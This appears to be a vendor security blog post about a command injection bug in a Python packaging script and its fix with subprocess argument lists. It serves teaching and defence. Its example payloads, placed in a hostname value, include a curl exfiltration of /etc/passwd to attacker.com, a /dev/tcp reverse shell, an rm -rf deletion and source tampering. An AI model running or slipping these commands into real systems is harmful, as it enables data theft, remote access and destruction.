Command Injection in Python Packaging Scripts: How Shell Metacharacters Can Compromise Your Build Pipeline
Introduction
Build and packaging scripts are often treated as second-class citizens when it comes to security reviews. They live in the packaging/ or scripts/ directory, they run in CI/CD pipelines, and developers tend to assume that only trusted engineers ever interact with them. That assumption can be dangerously wrong.
This post breaks down a high-severity command injection vulnerability found in packaging/checkPackageRuning.py — a script responsible for checking whether a package is running on a server. The vulnerability allowed an attacker who could influence a single variable to execute arbitrary shell commands with the full privileges of the packaging process. We'll explore how it worked, how it was fixed, and what you can do to prevent similar issues in your own codebases.
The Vulnerability Explained
What Is Command Injection?
Command injection is a class of vulnerability where an attacker can cause an application to execute unintended operating system commands. It typically occurs when user-controlled data is passed to a shell interpreter — either directly or indirectly — without proper sanitization.
Think of it like this: if you're building a SQL query by concatenating strings, you risk SQL injection. If you're building a shell command by concatenating strings, you risk command injection. The mechanics are the same; the consequences can be just as severe.
This vulnerability is tracked under CWE-78: Improper Neutralization of Special Elements used in an OS Command and is listed in the OWASP Top 10 under A03:2021 – Injection.
The Vulnerable Code
The root cause was a combination of two dangerous patterns used together:
- String interpolation to build a shell command from a variable (
serverHost) os.system()to execute that command, which invokes a full shell interpreter
Here's a simplified representation of the vulnerable pattern:
# ❌ VULNERABLE: os.system() with string interpolation
import os
serverHost = get_server_host() # Could be influenced by external input
cmd = "curl http://%s/health-check" % serverHost
os.system(cmd) # Passes the entire string to /bin/sh
The critical detail here is how os.system() works under the hood. On Unix-like systems, os.system(cmd) is essentially equivalent to:
/bin/sh -c "curl http://<serverHost>/health-check"
That means the string is handed to a shell interpreter, and the shell will happily process any metacharacters it finds. Characters like ;, |, &&, `, $(), and > all carry special meaning to the shell.
How Could It Be Exploited?
Imagine serverHost is populated from a configuration file, an environment variable, a command-line argument, or a network response — any source that an attacker might influence. Here's what a malicious value could look like:
# Attacker-controlled serverHost value:
localhost; rm -rf /important/data; echo pwned
When interpolated into the command string:
curl http://localhost; rm -rf /important/data; echo pwned
The shell interprets the semicolons as command separators and executes all three commands in sequence. The curl command runs first (possibly failing), then rm -rf destroys data, and finally echo pwned confirms execution.
Other attack patterns include:
# Exfiltrate sensitive files
localhost && cat /etc/passwd | curl -d @- https://attacker.com/collect
# Establish a reverse shell
localhost; bash -i >& /dev/tcp/attacker.com/4444 0>&1
# Tamper with the package being built
localhost; echo "malicious_code" >> ../src/main.py
# Escalate privileges if the script runs as root in CI
localhost; chmod +s /bin/bash
What's the Real-World Impact?
In the context of a packaging script, the blast radius is particularly large:
- Supply chain compromise: Injected code could modify the package before it's published, affecting every downstream consumer.
- CI/CD pipeline takeover: Build servers often have elevated permissions and access to secrets (API keys, signing certificates, deployment credentials).
- Data exfiltration: Sensitive build artifacts, source code, or environment variables could be sent to an attacker-controlled server.
- Persistence: An attacker could install backdoors in the build environment that persist across runs.
Even if the script is "only run by trusted engineers," consider:
- Compromised developer machines
- Malicious pull requests that modify configuration files read by the script
- Automated pipelines that pull configuration from external sources
The Fix
What Changed
The fix replaces os.system() with Python's subprocess module, which is the modern, secure way to execute external commands in Python.
# ✅ FIXED: subprocess with argument list (no shell interpolation)
import subprocess
serverHost = get_server_host()
# Pass arguments as a list — no shell is invoked
result = subprocess.run(
["curl", f"http://{serverHost}/health-check"],
capture_output=True,
text=True,
timeout=30
)
Why Does This Fix the Problem?
The key difference is how the arguments are passed to the operating system.
When you use subprocess.run() with a list of arguments (rather than a single string with shell=True), Python uses the execvp() system call directly. This means:
- No shell is invoked — there is no
/bin/sh -cwrapper - Each element in the list is treated as a literal argument — shell metacharacters have no special meaning
serverHostis passed as a raw string tocurl, not interpreted by a shell
Here's a side-by-side comparison to make this concrete:
| Approach | Shell Invoked? | Metacharacters Interpreted? | Safe? |
|---|---|---|---|
os.system("curl http://" + host) |
✅ Yes | ✅ Yes | ❌ No |
subprocess.run("curl http://" + host, shell=True) |
✅ Yes | ✅ Yes | ❌ No |
subprocess.run(["curl", "http://" + host]) |
❌ No | ❌ No | ✅ Yes |
Even if serverHost contains ; rm -rf /, it's passed as a literal string to curl, which will simply fail to resolve the hostname — no shell commands are executed.
A Note on shell=True
It's worth emphasizing: subprocess.run() with shell=True is just as dangerous as os.system(). The fix only works because arguments are passed as a list without enabling shell mode.
# ❌ Still vulnerable — shell=True negates the safety of subprocess
subprocess.run("curl http://" + serverHost, shell=True)
# ✅ Safe — list form, no shell
subprocess.run(["curl", "http://" + serverHost])
Prevention & Best Practices
1. Never Use os.system() with Variable Input
Consider os.system() deprecated for anything beyond the most trivial, hardcoded commands. The Python documentation itself recommends using subprocess instead. Add a linting rule or code review checklist item to flag any use of os.system().
2. Always Prefer Argument Lists in subprocess
Make it a team convention: when using subprocess.run(), subprocess.Popen(), or similar functions, always pass arguments as a list and never set shell=True unless you have a very specific reason and understand the risks.
# Prefer this pattern
subprocess.run(["git", "clone", repo_url], check=True)
# Over this
subprocess.run(f"git clone {repo_url}", shell=True) # ❌
3. Validate and Sanitize Inputs — Even in "Internal" Scripts
Apply input validation to any variable that influences a command, especially if it comes from:
- Command-line arguments (sys.argv, argparse)
- Environment variables (os.environ)
- Configuration files
- Network responses
- Database values
For hostnames specifically, validate against a strict allowlist or use a regex that only permits valid hostname characters:
import re
def validate_hostname(host: str) -> str:
# Allow only valid hostname characters
pattern = r'^[a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)*$'
if not re.match(pattern, host):
raise ValueError(f"Invalid hostname: {host!r}")
return host
4. Use Higher-Level Libraries When Possible
For HTTP requests specifically — which is what the curl command was performing — Python has excellent built-in alternatives that bypass the shell entirely:
import urllib.request
import urllib.error
# Use urllib or requests instead of shelling out to curl
try:
with urllib.request.urlopen(f"http://{serverHost}/health-check", timeout=10) as response:
status = response.status
except urllib.error.URLError as e:
print(f"Health check failed: {e}")
This approach is not only more secure but also more portable, more testable, and more Pythonic.
5. Apply the Principle of Least Privilege
Packaging and build scripts should run with the minimum permissions necessary. Even if a command injection vulnerability exists, limiting the process's privileges reduces the blast radius significantly:
- Don't run build scripts as
root - Use dedicated service accounts with scoped permissions
- Restrict network egress from build environments
- Use read-only mounts for source code where possible
6. Static Analysis and Automated Scanning
Several tools can detect command injection patterns automatically:
- Bandit (
bandit -r .): A Python-specific security linter that flagsos.system()calls andsubprocesswithshell=True - Semgrep: Highly configurable static analysis with rules for injection vulnerabilities
- CodeQL: GitHub's semantic code analysis engine, excellent for data-flow analysis
- OrbisAI Security: AI-powered security scanning (which detected this exact vulnerability)
Integrate these tools into your CI/CD pipeline so vulnerabilities are caught before they reach production.
7. Security Standards and References
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
- OWASP A03:2021: Injection
- Python Security Docs: subprocess — Subprocess management
- NIST NVD: Search for CVEs tagged with command injection to see real-world examples
Conclusion
This vulnerability is a textbook example of how a single unsafe function call — os.system() with string interpolation — can open the door to complete system compromise. What makes it particularly insidious is that the code works perfectly under normal conditions; the danger only manifests when input is malicious.
The key takeaways from this fix:
os.system()is dangerous when used with any variable input — treat it as a code smellsubprocesswith argument lists eliminates the shell injection surface by bypassing the shell entirely- Build and packaging scripts deserve the same security scrutiny as production application code — sometimes more, given their elevated privileges and access to signing keys and secrets
- Automated security scanning can catch these patterns before they become incidents
- Defense in depth — validation, least privilege, and monitoring all add layers of protection
Secure coding isn't just about protecting your users; it's about protecting your build pipeline, your infrastructure, and your supply chain. Every script counts.
This vulnerability was detected and patched using automated security scanning. If you'd like to learn more about securing your development pipeline, check out OrbisAI Security.